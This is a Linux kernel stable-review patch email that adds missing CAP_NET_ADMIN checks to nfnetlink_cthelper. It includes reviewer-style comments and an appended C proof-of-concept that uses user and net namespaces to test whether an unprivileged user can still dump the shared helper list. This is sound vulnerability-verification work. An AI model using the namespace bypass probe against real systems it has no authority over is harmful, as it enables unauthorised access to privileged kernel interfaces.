From: Greg Kroah-Hartman
To: linux-kernel@vger.kernel.org
Cc: Greg Kroah-Hartman, stable@vger.kernel.org, Kevin Cernekee, Pablo Neira Ayuso, Michal Kubecek
Subject: [PATCH 3.18 30/52] netfilter: nfnetlink_cthelper: Add missing permission checks
Date: Mon, 29 Jan 2018 13:56:48 +0100
Message-Id: <20180129123629.506022968@linuxfoundation.org>
In-Reply-To: <20180129123628.168904217@linuxfoundation.org>
References: <20180129123628.168904217@linuxfoundation.org>
X-Mailing-List: linux-kernel@vger.kernel.org

3.18-stable review patch.  If anyone has any objections, please let me know.

------------------
From: Kevin Cernekee

commit 4b380c42f7d00a395feede754f0bc2292eebe6e5 upstream.

The capability check in nfnetlink_rcv() verifies that the caller has
CAP_NET_ADMIN in the namespace that "owns" the netlink socket. However,
nfnl_cthelper_list is shared by all net namespaces on the system. An
unprivileged user can create user and net namespaces in which he holds
CAP_NET_ADMIN to bypass the netlink_net_capable() check:

  $ nfct helper list
  nfct v1.4.4: netlink error: Operation not permitted

  $ vpnns -- nfct helper list
  {
          .name = ftp,
          .queuenum = 0,
          .l3protonum = 2,
          .l4protonum = 6,
          .priv_data_len = 24,
          .status = enabled,
  };

Add capable() checks in nfnetlink_cthelper, as this is cleaner than
trying to generalize the solution.

Signed-off-by: Kevin Cernekee
Signed-off-by: Pablo Neira Ayuso
Acked-by: Michal Kubecek
Signed-off-by: Greg Kroah-Hartman

---
 net/netfilter/nfnetlink_cthelper.c |   10 ++++++++++
 1 file changed, 10 insertions(+)

--- a/net/netfilter/nfnetlink_cthelper.c
+++ b/net/netfilter/nfnetlink_cthelper.c
@@ -17,6 +17,7 @@ #include #include #include +#include #include #include
@@ -392,6 +393,9 @@ nfnl_cthelper_new(struct sock *nfnl, str struct nfnl_cthelper *nlcth; int ret = 0; + if (!capable(CAP_NET_ADMIN)) + return -EPERM; + if (!tb[NFCTH_NAME] || !tb[NFCTH_TUPLE]) return -EINVAL;
@@ -595,6 +599,9 @@ nfnl_cthelper_get(struct sock *nfnl, str struct nfnl_cthelper *nlcth; bool tuple_set = false; + if (!capable(CAP_NET_ADMIN)) + return -EPERM; + if (nlh->nlmsg_flags & NLM_F_DUMP) { struct netlink_dump_control c = { .dump = nfnl_cthelper_dump_table,
@@ -661,6 +668,9 @@ nfnl_cthelper_del(struct sock *nfnl, str struct nfnl_cthelper *nlcth, *n; int j = 0, ret; + if (!capable(CAP_NET_ADMIN)) + return -EPERM; + if (tb[NFCTH_NAME]) helper_name = nla_data(tb[NFCTH_NAME]);
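Review bot: in the @@ -17,6 +17,7 @@ hunk the header name on the added `+#include` line (and on the neighbouring context includes) has been stripped from this copy of the patch, so the include cannot be checked from the list archive; since capable() and CAP_NET_ADMIN are the only new symbols the other three hunks use, anyone applying this from the archive rather than from git should take the include line from upstream commit 4b380c42f7d00a395feede754f0bc2292eebe6e5 instead of retyping it.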
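Review bot: the `if (!capable(CAP_NET_ADMIN)) return -EPERM;` at the top of nfnl_cthelper_new() tests the initial user namespace, not the namespace that owns the socket as the netlink_net_capable() check in nfnetlink_rcv() does; that is the right gate given the changelog's point that nfnl_cthelper_list is shared by all net namespaces, but it also means a container that legitimately holds CAP_NET_ADMIN in its own user namespace now gets -EPERM for helper registration, and that behaviour change deserves a sentence in the changelog so stable users are not surprised. Placing the check ahead of the `!tb[NFCTH_NAME] || !tb[NFCTH_TUPLE]` validation is correct: an unprivileged caller should get EPERM before any attribute parsing happens.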
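Review bot: the check in nfnl_cthelper_get() is correctly placed before the `if (nlh->nlmsg_flags & NLM_F_DUMP)` branch; the `nfct helper list` bypass in the changelog is exactly such a dump request, and a check placed only on the lookup path after that branch would have left the dump, which is served by nfnl_cthelper_dump_table through the netlink_dump_control rather than by the code below the branch, open. The same ordering should be kept in mind for any other nfnetlink subsystem that gets a similar fix: the permission check must come before the dump is started.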
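Review bot: in nfnl_cthelper_del() the check precedes `if (tb[NFCTH_NAME]) helper_name = nla_data(tb[NFCTH_NAME]);`, so an unprivileged caller in a child namespace can no longer delete helpers from the globally shared list, which is the most damaging of the three operations (the changelog notes the list is shared by every net namespace) and the one the changelog's example least illustrates; a one-line mention that del was reachable too would make the severity clearer for stable maintainers. Style nit: the same three-line capable() block now appears three times, but the changelog already explains why a per-handler check was preferred over generalising it, so no change requested.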
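As an added example (not part of this patch, the kernel tree, or Kevin Cernekee's report), the following C program reproduces the probe in the changelog without vpnns or nfct: it unshares into a private user and net namespace, maps itself to uid 0 there so it holds CAP_NET_ADMIN in that namespace (assumption: that is what vpnns provides for its child), then sends the same NFNL_SUBSYS_CTHELPER dump request that `nfct helper list` sends and classifies the kernel's answer. The function names, the PROBE_* result codes and the constructed ack used by classify_constructed_ack() are this example's own, not kernel or libnetfilter API. It assumes a Linux kernel with unprivileged user namespaces enabled and nfnetlink_cthelper available; on a kernel carrying this patch the request is refused with EPERM from inside the namespace, on an unpatched one the (possibly empty) dump comes back.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <linux/sched.h>
#include <linux/netlink.h>
#include <linux/netfilter/nfnetlink.h>
#include <linux/netfilter/nfnetlink_cthelper.h>

enum probe_result { PROBE_DENIED, PROBE_LISTED, PROBE_ERROR }; /* example's own codes */

/* Build the NFNL_MSG_CTHELPER_GET dump request that "nfct helper list" sends
 * (nfgen_family AF_UNSPEC is the zero left by memset). Returns the message
 * length, or -1 if buf is too small. */
int build_cthelper_dump(unsigned char *buf, size_t len)
{
    size_t total = NLMSG_SPACE(sizeof(struct nfgenmsg));
    struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
    if (len < total)
        return -1;
    memset(buf, 0, total);
    nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct nfgenmsg));
    nlh->nlmsg_type = (NFNL_SUBSYS_CTHELPER << 8) | NFNL_MSG_CTHELPER_GET;
    nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_DUMP;
    ((struct nfgenmsg *)NLMSG_DATA(nlh))->version = NFNETLINK_V0;
    return (int)total;
}

/* Classify the first message of the kernel's reply: NLMSG_ERROR carrying -EPERM
 * is what nfnl_cthelper_get() returns once the capable() check is in place; a
 * zero-error ack, helper records or NLMSG_DONE mean the dump was accepted; any
 * other errno (e.g. subsystem not loaded) is inconclusive. */
int classify_reply(const unsigned char *buf, int len, int *err_out)
{
    const struct nlmsghdr *nlh = (const struct nlmsghdr *)buf;
    int err = 0;
    if (!NLMSG_OK(nlh, len))
        err = EBADMSG;
    else if (nlh->nlmsg_type == NLMSG_ERROR)
        err = -((const struct nlmsgerr *)NLMSG_DATA(nlh))->error;
    if (err_out)
        *err_out = err;
    return err == EPERM ? PROBE_DENIED : err ? PROBE_ERROR : PROBE_LISTED;
}

/* Offline self-check: feed classify_reply() a constructed reply shaped like the
 * kernel's netlink ack (error field = negated errno, 0 for a plain ack). */
int classify_constructed_ack(int err)
{
    unsigned char rep[NLMSG_SPACE(sizeof(struct nlmsgerr))] __attribute__((aligned(4)));
    struct nlmsghdr *nlh = (struct nlmsghdr *)rep;
    memset(rep, 0, sizeof rep);
    nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct nlmsgerr));
    nlh->nlmsg_type = NLMSG_ERROR;
    ((struct nlmsgerr *)NLMSG_DATA(nlh))->error = -err;
    return classify_reply(rep, (int)sizeof rep, NULL);
}

static int write_file(const char *path, const char *s)
{
    int fd = open(path, O_WRONLY);
    int ok = fd >= 0 && write(fd, s, strlen(s)) == (ssize_t)strlen(s);
    if (fd >= 0)
        close(fd);
    return ok ? 0 : -1;
}

/* Become uid 0 (hence a CAP_NET_ADMIN holder) in a fresh user+net namespace, the
 * part of the report that "vpnns --" provides (assumption). uid/gid are read
 * before unshare(2) because afterwards they read back as the unmapped overflow id. */
static int enter_private_netns(void)
{
    char map[64];
    unsigned uid = getuid(), gid = getgid();
    if (syscall(SYS_unshare, CLONE_NEWUSER | CLONE_NEWNET) < 0)
        return -1;
    snprintf(map, sizeof map, "0 %u 1", uid);
    if (write_file("/proc/self/uid_map", map) < 0 ||
        write_file("/proc/self/setgroups", "deny") < 0)
        return -1;
    snprintf(map, sizeof map, "0 %u 1", gid);
    return write_file("/proc/self/gid_map", map);
}

int main(void)
{
    unsigned char buf[4096] __attribute__((aligned(4)));
    int len = build_cthelper_dump(buf, sizeof buf), fd, err = 0, r;
    ssize_t n;
    if (enter_private_netns() < 0) { perror("namespace setup (needs unprivileged user namespaces)"); return 2; }
    fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_NETFILTER);
    if (fd < 0 || send(fd, buf, len, 0) < 0 || (n = recv(fd, buf, sizeof buf, 0)) < 0) { perror("netlink"); return 2; }
    r = classify_reply(buf, (int)n, &err);
    if (r == PROBE_DENIED)
        puts("EPERM inside the new namespace: capable() check present (patched)");
    else if (r == PROBE_LISTED)
        puts("helper dump accepted from an unprivileged namespace (unpatched)");
    else
        printf("inconclusive: %s\n", strerror(err));
    return r;
}
```

Run it as an ordinary user: exit status 0 means the kernel answered EPERM from inside the new namespace (the capable() check is present), 1 means the dump was accepted (the bypass from the changelog still works), 2 means the probe could not be set up (user namespaces disabled, or the cthelper subsystem not available), which says nothing about the patch either way.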